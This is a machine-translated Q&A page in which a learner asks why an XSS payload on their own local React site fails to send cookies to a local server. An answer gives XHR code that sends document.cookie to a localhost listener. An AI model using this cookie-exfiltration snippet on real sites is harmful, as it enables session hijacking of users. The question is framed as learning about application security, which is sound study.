Javascript 为什么这个xss脚本不调用我的服务器？_Javascript_Xss - Fatal编程技术网

Javascript 为什么这个xss脚本不调用我的服务器？

javascript

Javascript 为什么这个xss脚本不调用我的服务器？,javascript,xss,Javascript,Xss,我学习xss攻击是为了更好地了解应用程序安全性。我正在尝试执行一项基本任务：在我自己的本地网站上获取用户cookie并将其发送到本地服务器我已成功检索到带有警报的cookie。但是我不能执行api调用。这有什么问题吗 React应用程序：

我学习xss攻击是为了更好地了解应用程序安全性。我正在尝试执行一项基本任务：在我自己的本地网站上获取用户cookie并将其发送到本地服务器

我已成功检索到带有警报的cookie。但是我不能执行api调用。这有什么问题吗

React应用程序：


但仍然：不要那样做
您可以参考从服务器交付JavaScript文件并使用src
属性来加载它
当您只想调用HTTP请求时，可以使用XHR。您可以找到该主题的详细信息。但简而言之：
const xhr=new-XMLHttpRequest（）；
xhr.open（'GET'，'http://localhost:2021/xss?user=“+document.cookie）；
xhr.send（）；

这应该可以在没有安全问题的情况下完成工作。
好的，那么为什么React应用程序易受攻击？我想我应该永远不要使用SetDangerInnerHTML，因为它会允许xss攻击。但是如果我不能向远程服务器发送任何信息，那么真正入侵网站的唯一方法就是访问用户的计算机，对吗？如果可以将cookie发送到服务器，我应该如何做？也谢谢你编辑了问题的标题，我犯了一个愚蠢的错误。编辑：我在下面看到了你的答案，谢谢！




[cygwin]相关文章推荐



                                                        
重命名/映射Cygwin文件夹
cygwin 
安装Cygwin的旧版本
cygwin 
安装Cygwin x11软件包
cygwin 
在windows cygwin上使用g77生成可执行文件的问题
cygwinfortran 
                                       





随机文章推荐



                                                        
Linker 链接C++；-BDB-LNK2001
linker 
Linker 如何在Windows上将程序与ffmpeg静态链接？
linker 
Linker GNU ld未正确处理原点处理；有解决办法吗？
linker 
Linker Rcpp错误：/usr/bin/ld找不到-lgfortran
我正在通过《无缝R和C++与RCPP集成》这本书进行研究。我在Ubuntu 12.04上使用的是R版本3.1.0。我不知道如何正确链接必要的库。我在R中有以下代码：
R> library(Rcpp)
R> library(RcppArmadillo)
R> suppressMessages(require(inline))
R> code <- '
+   arma::mat coeff = Rcpp::
linker 
Linker xv6中的ELF头是什么？
linkeroperating-system 
Linker Fortran语言绑定错误：为什么赢'；它是否链接到MPI库？
linkerfortranmpi


                                        

                                        
                                        


                                                
                                                        [javascript]相关推荐
                                                        
如何将按位操作产生的32位JavaScript数字转换回64位数字
									Javascript
							 
Javascript 什么'；从jqGrid单元获取数据的最佳方式是什么？
									Javascript
							 									Jquery
							 									Jqgrid
							 
Javascript IOS Phonegap混合测试自动化
									Javascript
							 									Html
							 									Ios
							 									Cordova
							 
Javascript Android Webview按钮不工作
									Javascript
							 									Android
							 									Html
							 									Webview
							 
Javascript 保持多个项目中使用的文件同步的最佳方法？
									Javascript
							 
Javascript jQuery-aria控制vs数据属性以识别/选择DOM元素-首选哪种方法？
									Javascript
							 									Jquery
							 									Dom
							 
在Birt处理程序上使用Javascript reportContext.setPersistentGlobalVariable方法
									Javascript
							 									Eclipse
							 
从mojolicious调用javascript href
									Javascript
							 									Html
							 
Javascript中的简单命令行提示符（Node.js）
									Javascript
							 									Node.js
							 
Javascript jQuery Mobile-内部#页面导航仅在首次加载页面时使用双击
									Javascript
							 									Jquery
							 									Html
							 									Jquery Mobile
							 
Javascript 论《流星》中的事件扫描
									Javascript
							 									Meteor
							 
Javascript 网格元素垂直初始化Gridster.js
									Javascript
							 									Html
							 									Css
							 
Javascript 将HTML（用户定义的指令）插入视图-AngularJS
									Javascript
							 									Html
							 									Angularjs
							 
Javascript jquerybasicajaxget+；php返回
									Javascript
							 									Php
							 									Jquery
							 									Ajax
							 
Javascript 从左向右滚动的页面
									Javascript
							 									Jquery
							 									Html
							 									Css
							 
Javascript Google闭包编译器：使用工厂时如何进行继承
									Javascript
							 
Javascript 是否可以将Browserify API与一些JS文件的字符串内容一起使用？
									Javascript
							 									Node.js
							 
Javascript 在internet explorer中加载内容后重新启动gif
									Javascript
							 									Jquery
							 
Javascript react native-如何从不同视图（类）按导航栏上的“提交”按钮时获取表单数据
									Javascript
							 									React Native
							 
Javascript rails应用程序中不引人注目的js未按预期工作
									Javascript
							 									Ruby On Rails
							 
Javascript 在PHP生成的表中添加和访问按钮ID
									Javascript
							 									Php
							 									Html
							 									Mysql
							 
如何在typescript声明文件中定义单例javascript类
									Javascript
							 									Typescript
							 
Javascript 反应日期选择器在单击外部时隐藏已断开
									Javascript
							 									Angularjs
							 									Reactjs
							 
Javascript 如何使用字符串路径访问嵌套对象？
									Javascript
							 									Json
							 
Javascript 仅选择一个复选框
									Javascript
							 									Angularjs
							 									Angular
							 									Checkbox
							 									Ionic2
							 
Javascript 在emberjs 2.x和Firebase 3.x中使用自定义ID创建记录
									Javascript
							 									Firebase
							 									Ember.js
							 
Javascript 当新订户通过Mailchimp API加入列表时发送电子邮件通知
									Javascript
							 									Forms
							 
Javascript 使用toLocaleTimeString（）显示时间（毫秒）
									Javascript
							 									String
							 									Date
							 									Time
							 
在angular中使用Javascript和firebase
									Javascript
							 									Html
							 									Angular
							 									Firebase
							 
Javascript RxJs存储在Angular 5中-保存应用程序参数/数据
									Javascript
							 									Angular
							 
                                                        
                                                

                                                
                                                        Tags
                                                        
Vba
Tcp
Rabbitmq
Flask
Jenkins
Autohotkey
Graphviz
Ethereum
Web Applications
Pagination
Mqtt
Stream
Windows Mobile
Gcc
Email
Plone
.net 4.0
Sql Server 2008
Corda
Aem
Angular6
Active Directory
Ckeditor
Lucene
Jasmine
Ios5
Date
Azure Service Fabric
Parallel Processing
Macos
Compression
Google Calendar Api
Iis
Ms Office
Kernel
Visual Studio 2012
Ruby On Rails 3.2
Dependency Injection
Crystal Reports
Notepad++
Menu
Math
Perforce
Racket
Smtp
Build
Android Fragments
Deep Learning
Azure Devops
Linker
Amazon Cloudformation
Azure Sql Database
Netsuite
Meteor
Sed
Couchdb
Filter
Teamcity
R
Tensorflow
Dom
Google Visualization
Collections
Openshift
Dotnetnuke
Spring Boot
Biztalk
Csv
Ajax
Programming Languages
.net
Logic
Drop Down Menu
Computer Science
Matlab
Google Chrome
Internationalization
Office365
Opengl
Maven 2
Amazon Redshift
Ffmpeg
Perl
Google Plus
Modelica
Architecture
Memory Management
Tabs
Sml
Sql Server 2008 R2
Navigation
Datetime
Jms
Service
Sprite Kit
Here Api
Air
Regex
Python Sphinx
Webpack
Entity Framework Core
Cypress
Sap
Cucumber
Cloud
Stata
Mobile
Pointers
Stm32
Raspberry Pi
Antlr4
Sphinx
Aws Lambda
Opencart
Mono
Wolfram Mathematica
Character Encoding
Cocoa
Phpmyadmin
Devexpress
Mongoose
Hadoop
Jdbc
Axapta
Opengl Es
Big O
Xampp
Vaadin
Three.js
Tkinter
Silverlight
Virtualbox
Markdown
Cmake
Inno Setup
Sqlalchemy
Redis
Ansible
Google Chrome Devtools
Sharepoint 2013
Scikit Learn
Azure Ad B2c
Triggers
Autodesk Forge
Com
Google Apps Script
Nsis
Gitlab
Time Complexity
Google Maps
Odata
Geolocation
Javascript
Data Structures
Centos
Plot
Apache Zookeeper
Android
Tridion
Sdk
Hazelcast
Parameters
Utf 8
Mysql
Debugging
Google Cloud Firestore
Phantomjs
Jmeter
Opencl
Xaml
Spring Integration
Android Studio
Formatting
Linux Kernel
Nosql
Abap
Tableau Api
Fiware
Nativescript
Glassfish
Qml
Magento2
Playframework
Caching
Exception
Servlets
Cocos2d X
Verilog
Jestjs
Apache Spark
Yii2
Openerp
Dns
Mongodb
Artificial Intelligence
Doctrine
Resharper
Coding Style
Push Notification
Nservicebus
Talend


                

                        
						
                        
                                
                                        
                                                
                                                        
                                                                Copyright © 2024. All Rights Reserved by  - Fatal编程技术网